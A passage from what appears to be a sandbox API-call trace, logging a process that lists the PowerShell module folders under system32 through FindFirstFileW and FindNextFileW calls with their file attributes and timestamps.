ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0224.463] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0224.463] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0224.464] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0224.464] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0224.464] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0224.464] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0224.464] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0224.465] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0224.465] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0224.465] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0224.465] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0224.465] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0224.465] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0224.466] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0224.466] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0224.466] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0224.466] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0224.466] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0224.467] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0224.467] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0224.467] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0224.467] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0224.467] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0224.467] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0224.468] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0224.468] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0224.468] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0224.468] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0224.468] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.469] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de70) returned 1 [0224.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0224.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8df40) returned 1 [0224.470] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0224.470] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.470] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.470] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0224.470] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0224.471] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0224.471] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0224.471] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0224.471] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0224.471] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0224.471] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0224.472] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0224.472] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0224.472] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0224.472] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0224.472] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0224.473] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, 